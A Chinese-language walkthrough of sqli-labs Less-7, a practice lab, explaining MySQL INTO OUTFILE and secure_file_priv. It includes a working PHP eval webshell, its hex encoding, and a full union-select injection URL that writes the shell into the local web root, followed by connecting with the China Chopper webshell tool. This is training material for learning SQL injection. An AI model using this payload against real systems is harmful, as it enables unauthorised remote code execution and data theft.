SQL注入漏洞解析--less-7

我们先看一下第七关

页面显示use outfile意思是利用文件上传来做

outfile是将检索到的数据,保存到服务器的文件内:

格式:select * into outfile "文件地址"

示例:

mysql> select * into outfile 'f:/mysql/test/one' from teacher_class;

secure_file_priv参数用于限制LOAD DATA, SELECT ...OUTFILE,

LOAD_FILE()传到哪个指定目录。secure_file_priv 为 'NULL' 时,表示限制mysqld不允许导入或导出。

secure_file_priv 为 '/tmp' 时,表示限制mysqld只能在/tmp目录中执行导入导出;

secure_file_priv '没有值'时,表示不限制mysqld在任意目录的导入导出

修改之后重启mysql,再查看一下,就是空值

当输入'时报错

通过url上传一句话木马,用webshell连接工具连接(这里我用的是中国菜刀)

1.123就是连接密码

php 复制代码
<?php @eval($_POST['123']);?>

2.3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e是上边一句话木马的hex编码,into outfile指定在七关目录(目录写自己的)下创建2.php文件,文件内容就是刚上传的一句话木马

  1. 登录mysql查询secure_file_priv是否为空
  2. show global variables like 'secure%'; #查询secure_file_priv
  3. 当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出
  4. 当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下
  5. 当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制
  6. http://127.0.0.1/sqli-labs-php7-master/Less-7/index.php?id=-1')) union select 1,0x3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e,3 into outfile 'D:\phpstudy_x64_8.1.1.3\phpstudy_pro\WWW\sqli-labs-php7-master\Less-7\2.php'--+

3.用中国菜刀进行连接,测试连接成功

4.然后就可以访问数据库,从而获得信息

这道题其实出的挺鸡肋,你必须满足三个条件才能拿到他的数据库,第一就是必须拿到root权限;第二个就是 secure_file_priv这个必须不是NULL,这道题我这里是自己手动修改了,试想一下,如果你能修改权限了,还看不到里边的信息吗,或者你拿到root权限都不一定能修改的;第三个就是网站物理路径,这个想想办法还是有可能弄到。所以说这道题的条件还是很苛刻

相关推荐
向上的车轮14 分钟前
Django学习笔记二:数据库操作详解
数据库·django
编程老船长24 分钟前
第26章 Java操作Mongodb实现数据持久化
数据库·后端·mongodb
Mephisto.java25 分钟前
【力扣 | SQL题 | 每日四题】力扣2082, 2084, 2072, 2112, 180
sql·算法·leetcode
全栈师1 小时前
SQL Server中关于个性化需求批量删除表的做法
数据库·oracle
Data 3171 小时前
Hive数仓操作(十七)
大数据·数据库·数据仓库·hive·hadoop
BergerLee2 小时前
对不经常变动的数据集合添加Redis缓存
数据库·redis·缓存
gorgor在码农2 小时前
Mysql 索引底层数据结构和算法
数据结构·数据库·mysql
-seventy-2 小时前
SQL语句 (MySQL)
sql·mysql
bug菌¹2 小时前
滚雪球学Oracle[6.2讲]:Data Guard与灾难恢复
数据库·oracle·data·灾难恢复·guard
一般路过糸.3 小时前
MySQL数据库——索引
数据库·mysql